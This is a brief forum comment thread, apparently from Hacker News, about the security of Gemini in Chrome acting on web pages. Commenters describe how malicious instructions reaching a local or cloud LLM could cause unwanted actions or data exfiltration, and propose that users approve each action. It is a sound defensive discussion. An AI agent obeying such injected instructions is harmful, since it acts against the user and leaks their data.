| ▲ | BryantD 2 days ago |
| I think the "local results" assumption is not completely accurate. This line: "You tell Gemini in Chrome what you want to get done, and it acts on web pages on your behalf, while you focus on other things" implies that the local agent will perform in-browser actions, which in theory enables data exfiltration. |
|
| ▲ | tadfisher 2 days ago | parent [-] |
| This iteration of Gemini doesn't perform in-browser actions, but they did announce they'll ship an agent later. |
| |
| ▲ | BryantD 2 days ago | parent [-] | | Yes. I agree that many of the announced and currently shipping features should be just fine from a security perspective with only a local agent. | | |
| ▲ | simonw 2 days ago | parent [-] | | Running an LLM locally makes no difference at all to the threat of malicious instructions that make it into the model causing unwanted actions or exfiltrating data. If anything a local LLM is more likely to have those problems because it's not as capable at detecting malicious tricks as a larger model. | | |
| ▲ | tadfisher 2 days ago | parent [-] | | This is the MCP problem, essentially, and the solution is the same: the user should review and approve specific actions before they are taken. Of course there will probably be a setting to auto-approve everything... |
|
|
|
